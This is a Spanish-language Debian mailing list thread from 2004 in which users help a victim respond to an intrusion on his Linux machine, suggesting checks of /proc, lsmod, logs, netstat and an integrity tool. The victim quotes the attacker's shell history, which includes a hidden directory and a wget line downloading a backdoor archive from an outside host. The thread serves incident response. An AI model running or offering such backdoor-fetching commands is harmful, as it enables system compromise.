RV: Fui atacado]
Buenas,
Antes de nada saludos a la lista que es la primera vez que posteo.
A renglón seguido, puedes probar a mirar en /proc los números de
proceso. Los directorios que son numeros, son los identificadores de los
procesos que hay. Puedes acceder a ellos y con un simple cat ver datos sobre
ese proceso.
Además puedes comprobar si con lsmod observas algún módulo extraño.
Si lo ha hecho bien, que lo dudo, si ha troyanizado el sistema no aparecerá.
Pero igual suena la campana y lo pillas.
Observa los logs en /var/log para ver si puedes recabar más info
sobre el tipo que te ha entrado.
Mira tambien que no haya en tu home otros históricos de otros
interpretes (que se suele hacer para dejar las menos huellas posibles).
Con netstat -vaptn podrás observar (repito que siempre y cuando no
esté bien troyanizado el sistema) los procesos que escuchan cada puerto.
Y como punto final, la próxima vez usa algo como Aide para hacer una
imagen del sistema intacta y comparar en caso de que creas que ha habido una
intrusión.
Un saludo a todos/as,
Iñaki R.
-----Mensaje original-----
De: SoTaNeZ [mailto:sotanez@telefonica.net]
Enviado el: viernes, 20 de febrero de 2004 16:40
Para: debian-user-spanish@lists.debian.org
Asunto: Re: Fui atacado]
==> nada de fecha 18 de febrero en el syslog. Luego hice un history y me
==> aparecio esto que por su puesto yo no lo hice(màs raro aun):
==>
==> 484 cat /etc/issue
==> 485 ps
==> 486 bash
==> 487 /usr/sbin:/sbin:/usr/bin:/bin:/lib/security/.config/bin
==> 488 netstat -a
==> 489 cd /lib/security/.config/bin
==> 490 cd /lib/security/.config
==> 491 dir
==> 492 cd ssh
==> 493 dir
==> 494 cd ..
==> 495 wget http://www.gwydiondylan.org/downloads/binaries/linux/x86 496
==> /tar/gwydion-dylan-2.3.10-x86-linux.tar.gz
==> 497 wget
==>
http://www.gwydiondylan.org/downloads/binaries/linux/x86/tar/gwydion-dylan-2
.3.10-x86-linux.tar.gz
==> 498 wget geocities.com/s3rjiu/backdoor/ser.tar.gz
==>
==> Esto paquete porsuesto no los baje.
Parece que se han colado en tu ordenador y se han bajado un backdoor de esos
(y no ha borrado el historial, animalito). Pues yo me iría para empezar a la
pagina de la que se ha bajado el backdoor, para ver que es lo que hace, y
conectate a internet lo menos posible, y pon un firewall que bloquee
practicamente todo menos lo necesario. Mira los servicios abiertos a
internet y el kernel, a ver que vulnerabilidades tienen. También te puedes
bajar el manual análisis forense en linux o algo así que esta en
es.tldp.org. Y si quieres una lista mejorcita pues apuntate a la lista
hackindex (busca en google la web).
==>
==> Ah hago un ps y no sale nada, me dice esto:
==> Violación de segmento
Vaya, eso igual lo ha echo el troyano.
No soy ningún experto, asi que no puedo ayudar más, saludos.
==> Cual es la inseguridad que tengo?
==>
==> Gracias y saludos......
==>
==> --
==> Federico Contreras
==> T.S.U. en Informática
==> U.D.O.
==>
--
"No hay nada peor que ser vulgar"
sotanez@jabber.cn
--
To UNSUBSCRIBE, email to debian-user-spanish-request@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact
listmaster@lists.debian.org
Reply to: